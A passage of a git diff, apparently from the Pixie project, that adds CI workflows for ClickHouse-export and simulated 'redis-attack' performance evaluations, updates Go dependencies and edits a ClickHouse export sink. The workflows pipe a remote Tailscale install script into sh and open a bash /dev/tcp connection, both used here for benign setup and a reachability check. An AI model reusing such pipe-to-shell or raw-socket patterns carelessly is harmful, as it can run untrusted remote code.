diff --git a/.github/workflows/perf_clickhouse.yaml b/.github/workflows/perf_clickhouse.yaml new file mode 100644 index 00000000000..e3f34671652 --- /dev/null +++ b/.github/workflows/perf_clickhouse.yaml @@ -0,0 +1,158 @@ +--- +name: perf-eval-clickhouse +on: + workflow_dispatch: + inputs: + ref: + description: 'Branch or commit' + required: false + type: string + tags: + description: 'Tags (comma separated)' + required: false + type: string +permissions: + contents: read + packages: write +jobs: + get-dev-image-with-extras: + uses: ./.github/workflows/get_image.yaml + with: + image-base-name: "dev_image_with_extras" + ref: ${{ inputs.ref }} + + clickhouse-export-perf: + name: ClickHouse export perf eval + needs: get-dev-image-with-extras + runs-on: oracle-vm-16cpu-64gb-x86-64 + container: + image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }} + options: --cap-add=NET_ADMIN --device=/dev/net/tun + steps: + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + ref: ${{ inputs.ref }} + fetch-depth: 0 + - name: Add pwd to git safe dir + run: git config --global --add safe.directory `pwd` + - id: get-commit-sha + run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT + + # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is + # provisioned in the k8sstormcenter tailnet. Use + # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret` + # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so + # credentials rotate automatically instead of expiring on a fixed cadence. + - name: Start Tailscale sidecar + env: + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + run: | + curl -fsSL https://tailscale.com/install.sh | sh + mkdir -p /var/run/tailscale /var/lib/tailscale + tailscaled \ + --socket=/var/run/tailscale/tailscaled.sock \ + --state=/var/lib/tailscale/tailscaled.state & + until tailscale status --json >/dev/null 2>&1; do sleep 1; done + tailscale up \ + --authkey="${TS_AUTHKEY}" \ + --accept-routes \ + --hostname="pixie-perf-ci-${GITHUB_RUN_ID}" + + - name: Write kubeconfig + env: + KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }} + run: | + mkdir -p "${RUNNER_TEMP}" + echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig" + chmod 600 "${RUNNER_TEMP}/kubeconfig" + + # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute + # bazel/skaffold build wastes time. 
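The probe step that follows boils down to a bounded TCP connect against the API host parsed out of the kubeconfig's server URL. A minimal Go sketch of the same fail-fast check; the hardcoded server URL is a made-up stand-in for whatever `kubectl config view --minify` reports in CI:

```go
// Fail-fast connectivity check: parse the API server URL, then attempt a
// short TCP connect before any expensive bazel/skaffold work begins.
package main

import (
	"fmt"
	"net"
	"net/url"
	"os"
	"time"
)

func main() {
	server := "https://100.64.0.10:6443" // placeholder; CI reads this from the kubeconfig
	u, err := url.Parse(server)
	if err != nil {
		fmt.Fprintln(os.Stderr, "bad server URL:", err)
		os.Exit(1)
	}
	conn, err := net.DialTimeout("tcp", u.Host, 5*time.Second)
	if err != nil {
		fmt.Fprintf(os.Stderr, "API server %s unreachable over the tailnet: %v\n", u.Host, err)
		os.Exit(1) // fail here, not several minutes into the build
	}
	conn.Close()
	fmt.Println("tcp ok:", u.Host)
}
```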
+ - name: Tailscale connectivity probe + env: + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + tailscale status + tailscale netcheck + api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')" + api_ip="${api_host%%:*}" + api_port="${api_host##*:}" + echo "--- tailscale ping ${api_ip} ---" + tailscale ping --c 3 --until-direct=false "${api_ip}" || true + echo "--- tcp probe ${api_ip}:${api_port} ---" + timeout 5 bash -c "</dev/tcp/${api_ip}/${api_port}" && echo "tcp ok" + + - name: Write gcloud service account key + id: gcloud-creds + env: + GCLOUD_SA_KEY_B64: ${{ secrets.GCLOUD_SA_KEY_B64 }} + run: | + echo "${GCLOUD_SA_KEY_B64}" | base64 -d > /tmp/gcloud.json + chmod 600 /tmp/gcloud.json + echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT + + - name: Activate gcloud service account + env: + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + run: | + service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")" + gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS" + gcloud auth configure-docker + + - name: Log in to GHCR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin + + - name: Build and install px CLI + run: | + bazel build --config=x86_64_sysroot //src/pixie_cli:px + install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px + px version + + - name: Run clickhouse-export perf + env: + PX_API_KEY: ${{ secrets.PX_API_KEY }} + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + bazel run //src/e2e_test/perf_tool:perf_tool -- run \ + --api_key="${PX_API_KEY}" \ + --cloud_addr=pixie.austrianopencloudcommunity.org:443 \ + --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \ + --experiment_name=clickhouse-export \ + --suite=clickhouse-exec \ + --use_local_cluster \ + --export_backend=parquet-gcs \ + --gcs_bucket=k8sstormcenter-soc-perf \ + --container_repo=ghcr.io/k8sstormcenter \ + --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \ + --tags "${{ inputs.tags }}" + + - name: Upload skaffold stderr log + if: always() + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: skaffold-stderr-${{ github.run_id }}-${{ github.run_attempt }} + path: ${{ runner.temp }}/skaffold-stderr.log + if-no-files-found: ignore + + - name: Deactivate gcloud service account + if: always() + run: gcloud auth revoke || true + + - name: Tailscale logout + if: always() + run: tailscale logout || true diff --git a/.github/workflows/perf_soc_attack.yaml b/.github/workflows/perf_soc_attack.yaml new file mode 100644 index 00000000000..872dcbb4a8c --- /dev/null +++ b/.github/workflows/perf_soc_attack.yaml @@ -0,0 +1,158 @@ +--- +name: perf-eval-soc-attack +on: + workflow_dispatch: + inputs: + ref: + description: 'Branch or commit' + required: false + type: string + tags: + description: 'Tags (comma separated)' + required: false + type: string +permissions: + contents: read + packages: write +jobs: + get-dev-image-with-extras: + uses: ./.github/workflows/get_image.yaml + with: + image-base-name: "dev_image_with_extras" + ref: ${{ inputs.ref }} + + soc-attack-perf: + name: Sovereign SOC redis-attack perf eval + needs: get-dev-image-with-extras + runs-on: oracle-vm-16cpu-64gb-x86-64 + container: + image: ${{ needs.get-dev-image-with-extras.outputs.image-with-tag }} + options: --cap-add=NET_ADMIN --device=/dev/net/tun + steps: + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + ref: 
${{ inputs.ref }} + fetch-depth: 0 + - name: Add pwd to git safe dir + run: git config --global --add safe.directory `pwd` + - id: get-commit-sha + run: echo "commit-sha=$(git rev-parse --short HEAD)" >> $GITHUB_OUTPUT + + # TODO(ddelnano): swap TAILSCALE_AUTH_KEY for an OAuth client once one is + # provisioned in the k8sstormcenter tailnet. Use + # `tailscale/github-action@v2` with `oauth-client-id` and `oauth-secret` + # inputs (`TS_OAUTH_CLIENT_ID` / `TS_OAUTH_CLIENT_SECRET` secrets) so + # credentials rotate automatically instead of expiring on a fixed cadence. + - name: Start Tailscale sidecar + env: + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + run: | + curl -fsSL https://tailscale.com/install.sh | sh + mkdir -p /var/run/tailscale /var/lib/tailscale + tailscaled \ + --socket=/var/run/tailscale/tailscaled.sock \ + --state=/var/lib/tailscale/tailscaled.state & + until tailscale status --json >/dev/null 2>&1; do sleep 1; done + tailscale up \ + --authkey="${TS_AUTHKEY}" \ + --accept-routes \ + --hostname="pixie-perf-ci-${GITHUB_RUN_ID}" + + - name: Write kubeconfig + env: + KUBECONFIG_B64: ${{ secrets.KUBECONFIG_B64 }} + run: | + mkdir -p "${RUNNER_TEMP}" + echo "${KUBECONFIG_B64}" | base64 -d > "${RUNNER_TEMP}/kubeconfig" + chmod 600 "${RUNNER_TEMP}/kubeconfig" + + # Fail fast if Tailscale can't reach the cluster API, before the 2+ minute + # bazel/skaffold build wastes time. + - name: Tailscale connectivity probe + env: + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + tailscale status + tailscale netcheck + api_host="$(kubectl --kubeconfig="$KUBECONFIG" config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed -E 's|https?://||; s|/.*||')" + api_ip="${api_host%%:*}" + api_port="${api_host##*:}" + echo "--- tailscale ping ${api_ip} ---" + tailscale ping --c 3 --until-direct=false "${api_ip}" || true + echo "--- tcp probe ${api_ip}:${api_port} ---" + timeout 5 bash -c "</dev/tcp/${api_ip}/${api_port}" && echo "tcp ok" + + - name: Write gcloud service account key + id: gcloud-creds + env: + GCLOUD_SA_KEY_B64: ${{ secrets.GCLOUD_SA_KEY_B64 }} + run: | + echo "${GCLOUD_SA_KEY_B64}" | base64 -d > /tmp/gcloud.json + chmod 600 /tmp/gcloud.json + echo "gcloud-creds=/tmp/gcloud.json" >> $GITHUB_OUTPUT + + - name: Activate gcloud service account + env: + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + run: | + service_account="$(jq -r '.client_email' "$GOOGLE_APPLICATION_CREDENTIALS")" + gcloud auth activate-service-account "${service_account}" --key-file="$GOOGLE_APPLICATION_CREDENTIALS" + gcloud auth configure-docker + + - name: Log in to GHCR + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: echo "${GH_TOKEN}" | docker login ghcr.io -u "${{ github.actor }}" --password-stdin + + - name: Build and install px CLI + run: | + bazel build --config=x86_64_sysroot //src/pixie_cli:px + install -m 0755 bazel-bin/src/pixie_cli/px_/px /usr/local/bin/px + px version + + # The sovereign-soc suite installs Kubescape + Vector on the experiment + # cluster as part of the run (see KubescapeVectorWorkload). The + # kubescape-operator chart is pre-rendered under + # src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/ + # and applied via PrerenderedDeploy, so no extra ./scripts step is needed. + # + # ClickHouse operator metrics are scraped on the forensic cluster via + # the prom_recorder_override; the kubescape node-agent prom recorder + # is intentionally NOT overridden, since kubescape runs on the experiment + # cluster (where redis+bobctl drive traffic), so the recorder uses the + # default kubeconfig. 
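As context for the run step below, the `clickhouse-operator=:k8ss-forensic` override leaves the kubeconfig half of the value empty and pins only the kube context. A small Go sketch of how that flag value decomposes, mirroring the `parsePromRecorderOverrides` helper added to `src/e2e_test/perf_tool/cmd/run.go` later in this diff:

```go
// Decompose a --prom_recorder_override value of the form
// name=kubeconfig_path:kube_context, where either side of the colon
// may be empty.
package main

import (
	"fmt"
	"strings"
)

func main() {
	raw := "clickhouse-operator=:k8ss-forensic"
	nameAndVal := strings.SplitN(raw, "=", 2)
	parts := strings.SplitN(nameAndVal[1], ":", 2)
	kubeContext := ""
	if len(parts) == 2 {
		kubeContext = parts[1]
	}
	fmt.Printf("recorder=%s kubeconfig=%q context=%q\n", nameAndVal[0], parts[0], kubeContext)
	// Output: recorder=clickhouse-operator kubeconfig="" context="k8ss-forensic"
}
```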
+ - name: Run sovereign-soc redis-attack perf + env: + PX_API_KEY: ${{ secrets.PX_API_KEY }} + GOOGLE_APPLICATION_CREDENTIALS: ${{ steps.gcloud-creds.outputs.gcloud-creds }} + KUBECONFIG: ${{ runner.temp }}/kubeconfig + run: | + bazel run //src/e2e_test/perf_tool:perf_tool -- run \ + --api_key="${PX_API_KEY}" \ + --cloud_addr=pixie.austrianopencloudcommunity.org:443 \ + --commit_sha="${{ steps.get-commit-sha.outputs.commit-sha }}" \ + --experiment_name=redis-attack \ + --suite=sovereign-soc \ + --use_local_cluster \ + --export_backend=parquet-gcs \ + --gcs_bucket=k8sstormcenter-soc-perf \ + --container_repo=ghcr.io/k8sstormcenter \ + --prom_recorder_override 'clickhouse-operator=:k8ss-forensic' \ + --max_retries=1 \ + --tags "${{ inputs.tags }}" + + - name: Tailscale logout + if: always() + run: tailscale logout || true diff --git a/go.mod b/go.mod index 4224503b9c1..10f19e7657b 100644 --- a/go.mod +++ b/go.mod @@ -52,6 +52,7 @@ require ( github.com/ory/dockertest/v3 v3.8.1 github.com/ory/hydra-client-go v1.9.2 github.com/ory/kratos-client-go v0.10.1 + github.com/parquet-go/parquet-go v0.25.1 github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5 github.com/prometheus/client_golang v1.14.0 github.com/prometheus/client_model v0.3.0 @@ -115,6 +116,7 @@ require ( github.com/VividCortex/ewma v1.1.1 // indirect github.com/a8m/envsubst v1.3.0 // indirect github.com/alecthomas/participle/v2 v2.0.0-beta.5 // indirect + github.com/andybalholm/brotli v1.1.0 // indirect github.com/andybalholm/cascadia v1.1.0 // indirect github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect github.com/beorn7/perks v1.0.1 // indirect @@ -171,7 +173,7 @@ require ( github.com/google/go-querystring v1.1.0 // indirect github.com/google/gofuzz v1.2.0 // indirect github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 // indirect - github.com/google/uuid v1.3.0 // indirect + github.com/google/uuid v1.6.0 // indirect github.com/googleapis/gax-go/v2 v2.7.0 // indirect github.com/gorilla/securecookie v1.1.1 // indirect github.com/gorilla/websocket v1.5.0 // indirect @@ -191,7 +193,7 @@ require ( github.com/json-iterator/go v1.1.12 // indirect github.com/jstemmer/go-junit-report v0.9.1 // indirect github.com/kevinburke/ssh_config v0.0.0-20190725054713-01f96b0aa0cd // indirect - github.com/klauspost/compress v1.17.2 // indirect + github.com/klauspost/compress v1.17.9 // indirect github.com/kr/pretty v0.2.1 // indirect github.com/kr/text v0.2.0 // indirect github.com/kylelemons/godebug v1.1.0 // indirect @@ -232,6 +234,7 @@ require ( github.com/patrickmn/go-cache v2.1.0+incompatible // indirect github.com/pelletier/go-toml v1.9.3 // indirect github.com/peterbourgon/diskv v2.0.1+incompatible // indirect + github.com/pierrec/lz4/v4 v4.1.21 // indirect github.com/pkg/errors v0.9.1 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect github.com/prometheus/procfs v0.9.0 // indirect @@ -276,7 +279,7 @@ require ( golang.org/x/xerrors v0.0.0-20220907171357-04be3eba64a2 // indirect gomodules.xyz/jsonpatch/v2 v2.2.0 // indirect google.golang.org/appengine v1.6.7 // indirect - google.golang.org/protobuf v1.29.1 // indirect + google.golang.org/protobuf v1.34.2 // indirect gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/ini.v1 v1.67.0 // indirect gopkg.in/launchdarkly/go-jsonstream.v1 v1.0.1 // indirect @@ -317,3 +320,5 @@ replace ( google.golang.org/grpc => google.golang.org/grpc v1.43.0 gopkg.in/yaml.v2 => gopkg.in/yaml.v2 v2.4.0 ) + +replace google.golang.org/protobuf => google.golang.org/protobuf 
v1.29.1 diff --git a/go.sum b/go.sum index b8697cb4add..533a9f3f9b6 100644 --- a/go.sum +++ b/go.sum @@ -87,6 +87,8 @@ github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751/go.mod h1:LOuy github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= github.com/alecthomas/units v0.0.0-20190924025748-f65c72e2690d/go.mod h1:rBZYJk541a8SKzHPHnH3zbiI+7dagKZ0cgpgrD7Fyho= +github.com/andybalholm/brotli v1.1.0 h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M= +github.com/andybalholm/brotli v1.1.0/go.mod h1:sms7XGricyQI9K10gOSf56VKKWS4oLer58Q+mhRPtnY= github.com/andybalholm/cascadia v1.1.0 h1:BuuO6sSfQNFRu1LppgbD25Hr2vLYW25JvxHs5zzsLTo= github.com/andybalholm/cascadia v1.1.0/go.mod h1:GsXiBklL0woXo1j/WYWtSYYC4ouU9PqHO0sqidkEA4Y= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239 h1:kFOfPq6dUM1hTo4JG6LR5AXSUEsOjtdm0kw0FtQtMJA= @@ -447,8 +449,8 @@ github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaU github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I= -github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= +github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= github.com/googleapis/gax-go/v2 v2.7.0 h1:IcsPKeInNvYi7eqSaDjiZqDDKu5rsmunY0Y1YupQSSQ= github.com/googleapis/gax-go/v2 v2.7.0/go.mod h1:TEop28CZZQ2y+c0VxMUmu1lV+fQx57QpBWsYpwqHJx8= @@ -579,8 +581,8 @@ github.com/klauspost/compress v1.8.2/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0 github.com/klauspost/compress v1.9.0/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.9.5/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.13.6/go.mod h1:/3/Vjq9QcHkK5uEr5lBEmyoZ1iFhe47etQ6QUkpK6sk= -github.com/klauspost/compress v1.17.2 h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4= -github.com/klauspost/compress v1.17.2/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= +github.com/klauspost/compress v1.17.9 h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA= +github.com/klauspost/compress v1.17.9/go.mod h1:Di0epgTjJY877eYKx5yC51cX2A2Vl2ibi7bDH9ttBbw= github.com/klauspost/cpuid v1.2.1/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= @@ -775,6 +777,8 @@ github.com/ory/hydra-client-go v1.9.2 h1:sbp+8zwEJvhqSxcY8HiOkXeY2FspsfSOJ5ajJ07 github.com/ory/hydra-client-go v1.9.2/go.mod h1:TTg4Gt0SDC8+XoGtj5qzdtqxapfFW+Vmm41PFuC6n/E= github.com/ory/kratos-client-go v0.10.1 h1:kSRk+0leCJ1nPMS+FPho8b9WMzrKNpgszvta0Xo32QU= github.com/ory/kratos-client-go v0.10.1/go.mod h1:dOQIsar76K07wMPJD/6aMhrWyY+sFGEagLDLso1CpsA= +github.com/parquet-go/parquet-go v0.25.1 h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo= 
+github.com/parquet-go/parquet-go v0.25.1/go.mod h1:AXBuotO1XiBtcqJb/FKFyjBG4aqa3aQAAWF3ZPzCanY= github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= github.com/patrickmn/go-cache v2.1.0+incompatible h1:HRMgzkcYKYpi3C8ajMPV8OFXaaRUnok+kx1WdO15EQc= github.com/patrickmn/go-cache v2.1.0+incompatible/go.mod h1:3Qf8kWWT7OJRJbdiICTKqZju1ZixQ/KpMGzzAfe6+WQ= @@ -788,6 +792,8 @@ github.com/peterbourgon/diskv v2.0.1+incompatible h1:UBdAOUP5p4RWqPBg048CAvpKN+v github.com/peterbourgon/diskv v2.0.1+incompatible/go.mod h1:uqqh8zWWbv1HBMNONnaR/tNboyR3/BZd58JJSHlUSCU= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5 h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM= github.com/phayes/freeport v0.0.0-20171002181615-b8543db493a5/go.mod h1:iIss55rKnNBTvrwdmkUpLnDpZoAHvWaiq5+iMmen4AE= +github.com/pierrec/lz4/v4 v4.1.21 h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ= +github.com/pierrec/lz4/v4 v4.1.21/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= github.com/pingcap/errors v0.11.4 h1:lFuQV/oaUMGcD2tqt+01ROSmJs75VG1ToEOkZIZ4nE4= github.com/pingcap/errors v0.11.4/go.mod h1:Oi8TUi2kEtXXLMJk9l1cGmz20kV3TaQ0usTwv5KuLY8= github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e h1:aoZm08cpOy4WuID//EZDgcC4zIxODThtZNPirFr42+A= @@ -1327,10 +1333,6 @@ google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa h1:I0YcKz0I7OAhddo google.golang.org/genproto v0.0.0-20211208223120-3a66f561d7aa/go.mod h1:5CzLGKJ67TSI2B9POpiiyGha0AjJvZIUgRMt1dSmuhc= google.golang.org/grpc v1.43.0 h1:Eeu7bZtDZ2DpRCsLhUlcrLnvYaMK1Gz86a+hMVvELmM= google.golang.org/grpc v1.43.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= -google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= -google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= -google.golang.org/protobuf v1.27.1/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= google.golang.org/protobuf v1.29.1 h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM= google.golang.org/protobuf v1.29.1/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= diff --git a/go_deps.bzl b/go_deps.bzl index 6590dff5052..8ff37dbcbf6 100644 --- a/go_deps.bzl +++ b/go_deps.bzl @@ -156,8 +156,8 @@ def pl_go_dependencies(): name = "com_github_andybalholm_brotli", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/andybalholm/brotli", - sum = "h1:8uQZIdzKmjc/iuPu7O2ioW48L81FgatrcpfFmiq/cCs=", - version = "v1.0.5", + sum = "h1:eLKJA0d02Lf0mVpIDgYnqXcUn0GqVmEFny3VuID1U3M=", + version = "v1.1.0", ) go_repository( name = "com_github_andybalholm_cascadia", @@ -1628,8 +1628,8 @@ def pl_go_dependencies(): name = "com_github_google_uuid", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/google/uuid", - sum = "h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=", - version = "v1.3.0", + sum = "h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=", + version = "v1.6.0", ) go_repository( name = "com_github_googleapis_enterprise_certificate_proxy", @@ -2282,8 +2282,8 @@ def pl_go_dependencies(): name = 
"com_github_klauspost_compress", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "github.com/klauspost/compress", - sum = "h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4=", - version = "v1.17.2", + sum = "h1:6KIumPrER1LHsvBVuDa0r5xaG0Es51mhhB9BQB2qeMA=", + version = "v1.17.9", ) go_repository( name = "com_github_klauspost_cpuid", @@ -2992,6 +2992,13 @@ def pl_go_dependencies(): sum = "h1:mvZaddk4E4kLcXhzb+cxBsMPYp2pHqiQpWYkInsuZPQ=", version = "v1.3.0", ) + go_repository( + name = "com_github_parquet_go_parquet_go", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/parquet-go/parquet-go", + sum = "h1:l7jJwNM0xrk0cnIIptWMtnSnuxRkwq53S+Po3KG8Xgo=", + version = "v0.25.1", + ) go_repository( name = "com_github_pascaldekloe_goe", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -3041,6 +3048,13 @@ def pl_go_dependencies(): sum = "h1:rZQtoozkfsiNs36c7Tdv/gyGNzD1X1XWKO8rptVNZuM=", version = "v0.0.0-20171002181615-b8543db493a5", ) + go_repository( + name = "com_github_pierrec_lz4_v4", + build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], + importpath = "github.com/pierrec/lz4/v4", + sum = "h1:yOVMLb6qSIDP67pl/5F7RepeKYu/VmTyEXvuMI5d9mQ=", + version = "v4.1.21", + ) go_repository( name = "com_github_pingcap_errors", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], @@ -4427,6 +4441,7 @@ def pl_go_dependencies(): name = "org_golang_google_protobuf", build_directives = ["gazelle:map_kind go_binary pl_go_binary @px//bazel:pl_build_system.bzl", "gazelle:map_kind go_test pl_go_test @px//bazel:pl_build_system.bzl"], importpath = "google.golang.org/protobuf", + replace = "google.golang.org/protobuf", sum = "h1:7QBf+IK2gx70Ap/hDsOmam3GE0v9HicjfEdAxE62UoM=", version = "v1.29.1", ) diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml index 33389dffb2e..f8370a1f7e1 100644 --- a/skaffold/skaffold_vizier.yaml +++ b/skaffold/skaffold_vizier.yaml @@ -81,6 +81,7 @@ profiles: path: /build/artifacts/context=./bazel/args value: - --compilation_mode=opt + - --config=x86_64_sysroot - name: heap patches: - op: add diff --git a/src/carnot/exec/clickhouse_export_sink_node.cc b/src/carnot/exec/clickhouse_export_sink_node.cc index 6a11a42d37a..c7000ab99d4 100644 --- a/src/carnot/exec/clickhouse_export_sink_node.cc +++ b/src/carnot/exec/clickhouse_export_sink_node.cc @@ -35,6 +35,9 @@ namespace px { namespace carnot { namespace exec { +// TODO(ddelnano): Defend against columns that don't exist. These should be +// ignored by the Node. 
+ using table_store::schema::RowBatch; using table_store::schema::RowDescriptor; @@ -148,12 +151,12 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons break; } case types::UINT128: { - // UINT128 is exported as STRING (UUID format) + // UINT128 is exported as STRING in "high:low" format to match + // the ClickHouseSourceNode's parsing in clickhouse_source_node.cc auto col = std::make_shared<clickhouse::ColumnString>(); for (int64_t i = 0; i < num_rows; ++i) { auto val = types::GetValueFromArrowArray<types::DataType::UINT128>(arrow_col.get(), i); - std::string uuid_str = sole::rebuild(absl::Uint128High64(val), absl::Uint128Low64(val)).str(); - col->Append(uuid_str); + col->Append(absl::Substitute("$0:$1", absl::Uint128High64(val), absl::Uint128Low64(val))); } block.AppendColumn(mapping.clickhouse_column_name(), col); break; @@ -164,6 +167,34 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons } } + // Auto-derive event_time from time_ if time_ is present but event_time is not. + // The ClickHouse table schema uses event_time (DateTime64(3), milliseconds) for + // partitioning and ordering, but the Pixie table has time_ (TIME64NS, nanoseconds). + bool has_time_ = false; + bool has_event_time 